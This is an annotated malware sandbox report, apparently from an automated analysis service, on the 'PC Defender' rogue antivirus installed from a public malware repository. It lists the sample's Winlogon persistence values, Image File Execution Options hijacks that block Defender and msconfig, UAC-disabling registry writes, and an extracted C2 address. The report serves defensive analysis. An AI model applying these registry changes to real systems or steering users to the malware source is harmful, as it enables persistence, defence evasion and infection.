Resubmissions
  20-08-2024 19:03  240820-xqj6raybkf  score 10
  20-08-2024 19:02  240820-xpw4xssbrj  score 3
  20-08-2024 18:59  240820-xnkphayaqh  score 10
  20-08-2024 18:53  240820-xj2r8asakj  score 6

Analysis
  max time kernel: 109s
  max time network: 110s
  platform: windows11-21h2_x64
  resource: win11-20240802-en
  resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  submitted: 20-08-2024 18:59
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
  Sample: https://github.com/Endermanch/MalwareDatabase
  Resource: win11-20240802-en

Errors
  General: -

Target: https://github.com/Endermanch/MalwareDatabase
  (The behavioral task opens this URL in Edge; the archives downloaded from it are the ones listed under NTFS ADS below.)

Malware Config
  Extracted: http://93.115.82.248/?0=1&1=1&2=9&3=i&4=9200&5=1&6=1111&7=texyhekisb
Signatures

Modifies WinLogon for persistence  2 TTPs  2 IoCs
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\""  MsiExec.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\guard-wojl.exe"  guard-wojl.exe
  For comparison, the defaults are Userinit = "C:\Windows\system32\userinit.exe," and Shell = "explorer.exe". Appending Antispyware.exe to Userinit makes it run at every interactive logon; the per-user Shell value replaces Explorer with guard-wojl.exe for that account, so the user gets the rogue program instead of a desktop. Note that the Userinit write landed under WOW6432Node, the 32-bit installer's redirected view of the key, so on a 64-bit host check the native Winlogon key as well before concluding which value Winlogon will actually read.
  Related UAC policy writes by the same process (also listed under System policy modification below):
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"  guard-wojl.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"  guard-wojl.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  guard-wojl.exe
Blocklisted process makes network request  1 IoCs
  flow 62  pid 5648  mshta.exe
  mshta.exe is a script host with no network activity of its own, so flow 62 is the one to pull from the capture.

Event Triggered Execution: Image File Execution Options Injection  1 TTPs  12 IoCs
  guard-wojl.exe creates an Image File Execution Options subkey for six executables and points each one's Debugger value at svchost.exe. Once a Debugger value exists, launching that image name starts the named "debugger" with the original command line appended, so the Defender / Security Essentials components and msconfig listed here run svchost.exe instead of themselves: the user cannot open the AV user interface, the command-line scanner or msconfig to undo the damage.
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe  guard-wojl.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\Debugger = "svchost.exe"  guard-wojl.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe  guard-wojl.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe"  guard-wojl.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe  guard-wojl.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe"  guard-wojl.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe  guard-wojl.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "svchost.exe"  guard-wojl.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe  guard-wojl.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger = "svchost.exe"  guard-wojl.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe  guard-wojl.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\Debugger = "svchost.exe"  guard-wojl.exe
Executes dropped EXE  1 IoCs
  pid 3624  guard-wojl.exe
  Additional registry write recorded for this process:
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  guard-wojl.exe

Enumerates connected drives  3 TTPs  46 IoCs
  Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only)  \??\A: through \??\Z: except C:, D: and F: (A, B, E, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z; each letter opened twice, 46 events)  msiexec.exe
  Drive-letter probing by msiexec.exe is typical Windows Installer behaviour during an install (volume costing), so on its own this is low-signal.
Indicator Removal: File Deletion  1 TTPs
  Adversaries may delete files left behind by the actions of their intrusion activity.

Legitimate hosting services abused for malware hosting/C2  1 TTPs  3 IoCs
  flow 12  raw.githubusercontent.com
  flow 13  raw.githubusercontent.com
  flow 42  raw.githubusercontent.com
  The target of this task is itself a GitHub repository, so these flows are consistent with fetching the repository contents rather than with C2 traffic from the dropped sample.

Looks up external IP address via web service  1 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 12  checkip.dyndns.org
Drops file in System32 directory  3 IoCs
  File opened for modification  C:\Windows\SysWOW64\services.msc  guard-wojl.exe
  File opened for modification  C:\Windows\SysWOW64\eventvwr.msc  guard-wojl.exe
  File opened for modification  C:\Windows\SysWOW64\diskmgmt.msc  guard-wojl.exe
  These are the Services, Event Viewer and Disk Management consoles. Opening them for modification is tampering with the administrative tooling a user would reach for, and is not part of the MSI install (the installer's own writes are the msiexec.exe entries below). The SysWOW64 path shows guard-wojl.exe is a 32-bit process.

Drops file in Program Files directory  3 IoCs
  File created  C:\Program Files (x86)\Def Group\PC Defender\hook.dll  msiexec.exe
  File created  C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe  msiexec.exe
  File created  C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe  msiexec.exe

Drops file in Windows directory  16 IoCs
  File created  C:\Windows\Installer\e583a35.msi  msiexec.exe
  File opened for modification  C:\Windows\Installer\e583a35.msi  msiexec.exe
  File opened for modification  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log  msiexec.exe
  File created  C:\Windows\Installer\SourceHash{FC2ABC8E-3715-4A32-B8B5-559380F45282}  msiexec.exe
  File created  C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe  msiexec.exe
  File created  C:\Windows\SystemTemp\~DF5AD045C28380A941.TMP  msiexec.exe
  File created  C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe  msiexec.exe
  File created  C:\Windows\Installer\inprogressinstallinfo.ipi  msiexec.exe
  File created  C:\Windows\SystemTemp\~DFC2BAB02F6CB320EB.TMP  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI3AD2.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\  msiexec.exe
  File created  C:\Windows\SystemTemp\~DFA9048863089544AA.TMP  msiexec.exe
  File opened for modification  C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe  msiexec.exe
  File opened for modification  C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe  msiexec.exe
  File created  C:\Windows\Installer\e583a39.msi  msiexec.exe
  File created  C:\Windows\SystemTemp\~DF4BFAB8646DC9429D.TMP  msiexec.exe
  The cached copy of the package (e583a35.msi) and the product directory {FC2ABC8E-3715-4A32-B8B5-559380F45282} under C:\Windows\Installer are the artifacts to collect; they survive after the temporary files are gone.
Enumerates physical storage devices  1 TTPs
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery  1 TTPs  7 IoCs
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  [email protected]
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  MsiExec.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  [email protected]
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  guard-wojl.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Almost every Windows process reads this key while initialising its locale, so the read by itself is not evidence of geofencing.

Checks SCSI registry key(s)  3 TTPs  5 IoCs
  SCSI information is often read in order to detect sandboxing environments.
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr  vssvc.exe
  Set value (data)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = [value omitted]  vssvc.exe
  Set value (data)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  vssvc.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters  vssvc.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters  vssvc.exe
  All five events come from vssvc.exe, the Volume Shadow Copy service, writing partition-manager cache values while a snapshot is taken (the SnapshotDataCache blob starts with the ASCII tag "SNAPPART"). That is consistent with the installer creating a restore point, not with sandbox detection by the sample.

Enumerates system info in registry  2 TTPs  3 IoCs
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  msedge.exe
  Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  All three reads are by msedge.exe, the browser used to open the target URL, not by the dropped sample.
Modifies data under HKEY_USERS  64 IoCs
  All 64 events are under \REGISTRY\USER\.DEFAULT and come from Office Click-to-Run, the logon UI and the installer, not from the dropped sample. Grouped by process, with repeated writes collapsed (paths are relative to \REGISTRY\USER\.DEFAULT):
  OfficeClickToRun.exe (Office 16.0 experiment/telemetry housekeeping and the Internet Settings zone map):
    Key created  Software\Microsoft\Office\16.0
    Key created  Software\Microsoft\Office\16.0\Common
    Key created  Software\Microsoft\Office\16.0\Common\ClientTelemetry
    Key created  Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata
    Key created  Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe
    Key created  Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor
    Set value (str)  Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"  (written twice, same entries in a different order)
    Set value (str)  Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"  (written twice, same entries in a different order)
    Key deleted  Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor
    Key deleted  Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe
    Key created  Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
    Key created  Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun
    Key created  Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData
    Key created  Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun
    Key created  Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun
    Key created  Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides
    Key created  Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides
    Key created  Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides
    Key created  Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation
    Set value (int)  Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2"  (also written as "1")
    Key created  Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
    Set value (int)  Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
    Set value (int)  Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
    Set value (int)  Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
    Set value (int)  Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
  LogonUI.exe (theme and DWM colour values):
    Key created  Software\Microsoft\Windows\CurrentVersion\Themes\History
    Set value (int)  Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"
    Key created  Software\Microsoft\Windows\CurrentVersion\Explorer\Accent
    Set value (int)  Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"
    Set value (int)  Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"
    Key created  Software\Microsoft\Windows\DWM
    Set value (int)  Software\Microsoft\Windows\DWM\AccentColor = "4292114432"
    Set value (int)  Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"
    Set value (int)  Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"
    Set value (int)  Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"
    Set value (int)  Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"
    Set value (int)  Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"
    Set value (int)  Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"
    Set value (int)  Software\Microsoft\Windows\DWM\EnableWindowColorization = "64"
  msiexec.exe / MsiExec.exe:
    Key deleted  SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E
    Key deleted  Software\Classes\Local Settings\MuiCache\26
    Key created  Software\Classes\Local Settings\MuiCache\27
    Key deleted  SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27
    Key created  Software\Microsoft\Windows Script\Settings
    Set value (int)  Software\Microsoft\Windows Script\Settings\JITDebug = "0"
Modifies registry class  32 IoCs
  Windows Installer product registration by msiexec.exe, under \REGISTRY\MACHINE\SOFTWARE\Classes\Installer, for product code E8CBA2CF517323A48B5B5539084F2528 and upgrade code C73BCE36FA1AA0E45AB2649A3FA0D390. The product code is the packed ("squished") form of {FC2ABC8E-3715-4A32-B8B5-559380F45282}, the directory created under C:\Windows\Installer above, so the two signatures describe the same package.
    Key created  Products\E8CBA2CF517323A48B5B5539084F2528  (twice; once through \REGISTRY\MACHINE\Software\Classes)
    Set value (str)  Products\E8CBA2CF517323A48B5B5539084F2528\ProductName = "PC Defender"
    Set value (str)  Products\E8CBA2CF517323A48B5B5539084F2528\PackageCode = "18627594958587344B2B3984171915B1"
    Set value (int)  Products\E8CBA2CF517323A48B5B5539084F2528\Language = "1033"
    Set value (int)  Products\E8CBA2CF517323A48B5B5539084F2528\Version = "16777216"
    Set value (int)  Products\E8CBA2CF517323A48B5B5539084F2528\AuthorizedLUAApp = "0"
    Set value (int)  Products\E8CBA2CF517323A48B5B5539084F2528\InstanceType = "0"
    Set value (int)  Products\E8CBA2CF517323A48B5B5539084F2528\DeploymentFlags = "3"
    Set value (int)  Products\E8CBA2CF517323A48B5B5539084F2528\AdvertiseFlags = "388"
    Set value (int)  Products\E8CBA2CF517323A48B5B5539084F2528\Assignment = "1"
    Set value (data)  Products\E8CBA2CF517323A48B5B5539084F2528\Clients = 3a0000000000
    Key deleted  Products\E8CBA2CF517323A48B5B5539084F2528
    Key created  Products\E8CBA2CF517323A48B5B5539084F2528\SourceList  (twice)
    Set value (str)  Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\PackageName = "PCDefenderSilentSetup.msi"
    Set value (str)  Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\"
    Key created  Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net
    Set value (str)  Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\"
    Key deleted  Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net
    Key created  Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media
    Set value (str)  Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media\1 = ";"
    Key deleted  Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media
    Key deleted  Products\E8CBA2CF517323A48B5B5539084F2528\SourceList
    Key created  Features\E8CBA2CF517323A48B5B5539084F2528
    Set value (str)  Features\E8CBA2CF517323A48B5B5539084F2528\DefaultFeature
    Key deleted  Features\E8CBA2CF517323A48B5B5539084F2528
    Key created  UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390
    Set value (str)  UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390\E8CBA2CF517323A48B5B5539084F2528
    Key deleted  UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390
  Other processes:
    Key created  \REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000_Classes\Local Settings  [email protected]
    Key created  \REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000_Classes\Local Settings  msedge.exe
  The package name PCDefenderSilentSetup.msi and the source path under ...\Temp\RarSFX0\ show the MSI was unpacked from a WinRAR self-extracting archive and installed silently; Version 16777216 is 0x01000000, i.e. product version 1.0.0.
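Windows Installer stores product, upgrade and package codes under Classes\Installer in a packed form: the first three GUID groups are reversed as hex strings and the last two are reversed byte by byte (each byte's two hex digits swapped). The following Python is an added example, written for this page and not part of the sandbox report or of any Microsoft tooling; it converts in both directions and checks that the product code registered above resolves to the GUID that names the C:\Windows\Installer directory in the "Drops file in Windows directory" signature. The three codes are taken from the registry writes above.

```python
import re

PACKED_RE = re.compile(r"^[0-9A-Fa-f]{32}$")
GUID_RE = re.compile(
    r"^\{?([0-9A-Fa-f]{8})-([0-9A-Fa-f]{4})-([0-9A-Fa-f]{4})-([0-9A-Fa-f]{4})-([0-9A-Fa-f]{12})\}?$"
)


def _swap_nibbles(hexstr: str) -> str:
    """Swap the two hex digits of every byte: "8B5B" -> "B8B5"."""
    return "".join(hexstr[i + 1] + hexstr[i] for i in range(0, len(hexstr), 2))


def unpack_code(packed: str) -> str:
    """32-hex Installer code -> {GUID} as it appears in C:\\Windows\\Installer."""
    if not PACKED_RE.match(packed):
        raise ValueError("expected 32 hex digits, got %r" % packed)
    p = packed.upper()
    return "{%s-%s-%s-%s-%s}" % (
        p[0:8][::-1],            # Data1, reversed as a string
        p[8:12][::-1],           # Data2
        p[12:16][::-1],          # Data3
        _swap_nibbles(p[16:20]), # Data4[0:2], byte-wise
        _swap_nibbles(p[20:32]), # Data4[2:8], byte-wise
    )


def pack_guid(guid: str) -> str:
    """{GUID} -> the packed key name used under Classes\\Installer\\Products etc."""
    m = GUID_RE.match(guid)
    if not m:
        raise ValueError("not a GUID: %r" % guid)
    a, b, c, d, e = (g.upper() for g in m.groups())
    return a[::-1] + b[::-1] + c[::-1] + _swap_nibbles(d) + _swap_nibbles(e)


# Codes copied from the "Modifies registry class" signature (page data, not constructed).
REPORT_CODES = {
    "ProductCode": "E8CBA2CF517323A48B5B5539084F2528",
    "UpgradeCode": "C73BCE36FA1AA0E45AB2649A3FA0D390",
    "PackageCode": "18627594958587344B2B3984171915B1",
}
# Directory name from the "Drops file in Windows directory" signature.
INSTALLER_DIR_GUID = "{FC2ABC8E-3715-4A32-B8B5-559380F45282}"


def resolve_report_codes() -> dict:
    """Map each packed code from the report to its {GUID} form."""
    return {name: unpack_code(code) for name, code in REPORT_CODES.items()}


if __name__ == "__main__":
    resolved = resolve_report_codes()
    for name, guid in resolved.items():
        print(f"{name:12} {REPORT_CODES[name]}  ->  {guid}")
    print("ProductCode matches Installer directory:",
          resolved["ProductCode"] == INSTALLER_DIR_GUID)
```

With the resolved GUIDs you can pull the matching cached package from C:\Windows\Installer on a live host, or query HKLM\SOFTWARE\Classes\Installer\Products\<packed> directly for the ProductName and LastUsedSource seen above.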
NTFS ADS  4 IoCs
  File opened for modification  C:\Users\Admin\Downloads\PC Defender.zip:Zone.Identifier  msedge.exe
  File opened for modification  C:\Users\Admin\Downloads\PC Defender (1).zip:Zone.Identifier  msedge.exe
  File opened for modification  C:\Users\Admin\Downloads\Windows Accelerator Pro.zip:Zone.Identifier  msedge.exe
  File created  C:\Users\Admin\AppData\Roaming\guard-wojl.exe\:Zone.Identifier:$DATA  [email protected]
  The three Edge writes are Mark-of-the-Web being applied to archives downloaded from the target repository. The fourth is the process that drops guard-wojl.exe writing a Zone.Identifier stream onto it; that stream is what SmartScreen and the Attachment Manager consult, so read its ZoneId rather than assuming the dropped binary carries no mark.
Suspicious behavior: EnumeratesProcesses  64 IoCs
  pid 2120, 3552, 2264, 1284, 768, 6136  msedge.exe  (2 events each)
  pid 1324  identity_helper.exe  (2 events)
  pid 4452  msiexec.exe  (2 events)
  pid 3624  guard-wojl.exe  (the remaining 48 events)
  Repeated process enumeration by guard-wojl.exe fits the dropped proccheck.exe / hook.dll components: the rogue AV polls the process list so it can interfere with tools the user starts.

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary  9 IoCs
  pid 3552  msedge.exe  (9 events)

Suspicious use of AdjustPrivilegeToken  64 IoCs
  pid 4972  msiexec.exe: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  pid 1648  vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  pid 4452  msiexec.exe: SeSecurityPrivilege, SeBackupPrivilege, then alternating SeRestorePrivilege / SeTakeOwnershipPrivilege for the rest of the 64 events
  Enabling the whole privilege set at once, and the paired SeRestore/SeTakeOwnership use by the service-side msiexec (4452) while files are laid down, is the pattern of an ordinary MSI install. None of these events is attributed to guard-wojl.exe.

Suspicious use of FindShellTrayWindow  64 IoCs
  pid 3552  msedge.exe  (62 events)
  pid 4972  msiexec.exe  (2 events)

Suspicious use of SendNotifyMessage  17 IoCs
  pid 3552  msedge.exe  (16 events)
  pid 3624  guard-wojl.exe  (1 event)

Suspicious use of SetWindowsHookEx  7 IoCs
  pid 912  [email protected]
  pid 5720  [email protected]
  pid 3624  guard-wojl.exe  (2 events)
  pid 5932  LogonUI.exe
  pid 5740  OfficeClickToRun.exe
  pid 5480  OfficeClickToRun.exe
  The hooks installed by guard-wojl.exe are the ones of interest here; together with the dropped hook.dll they are the mechanism to look at for how the rogue AV intercepts user input or window messages.

Suspicious use of WriteProcessMemory  64 IoCs
  All 64 events are pid 3552 msedge.exe writing into processes 3252 (procid_target 81), 3048 (82), 2120 (83) and 4024 (84), nearly all of them into 3048 and 4024. This is consistent with the browser setting up its own child processes, not with injection by the sample.
System policy modification 1 TTPs 5 IoCs
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (process: guard-wojl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" (process: guard-wojl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" (process: guard-wojl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" (process: guard-wojl.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (process: guard-wojl.exe)
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
(Child processes are indented under their parent; the PID is the one the sandbox recorded.)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3552)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Endermanch/MalwareDatabase
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3252)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe565b3cb8,0x7ffe565b3cc8,0x7ffe565b3cd8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3048)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1652 /prefetch:2

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2120)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4024)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2728)
